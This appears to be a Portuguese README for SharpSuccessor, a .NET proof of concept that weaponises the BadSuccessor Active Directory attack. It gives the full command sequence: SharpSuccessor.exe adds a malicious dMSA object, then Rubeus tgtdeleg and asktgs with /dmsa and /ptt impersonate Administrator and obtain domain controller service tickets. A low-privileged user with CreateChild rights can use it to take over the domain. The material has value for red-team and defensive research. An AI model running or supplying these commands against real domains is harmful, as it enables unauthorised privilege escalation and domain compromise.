
SharpSuccessor é uma Prova de Conceito (POC) em .NET para armar completamente o ataque BadSuccessor de Yuval Gordon (@YuG0rd), da Akamai.
O SharpSuccessor é uma Prova de Conceito (POC) em .NET para armar completamente o ataque BadSuccessor de Yuval Gordon (@YuG0rd) da Akamai. Um usuário com privilégios baixos que tenha permissões CreateChild sobre qualquer Unidade Organizacional (OU) no domínio Active Directory e acesso de escrita em um objeto-alvo pode realizar a tomada de conta.
Use o SharpSuccessor para adicionar e armar o objeto dMSA, bem como gravar os atributos adequados na conta de destino que você deseja personificar:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

Solicite um TGT no contexto do usuário atual, neste caso jdoe:
Rubeus.exe tgtdeleg /nowrap

Em seguida, use esse tgt para personificar a conta dMSA:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

Agora você pode solicitar um ticket de serviço com o contexto de Administrador para qualquer SPN, incluindo os Controladores de Domínio para pós-exploração. Por exemplo, aqui vou mostrar privilégios de administrador para SMB no controlador de domínio:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

Agora que temos o ticket na memória, podemos testar o acesso:

Muito obrigado a Jim Sykora e Garrett Foster pelas inspirações e assistência para esta ferramenta!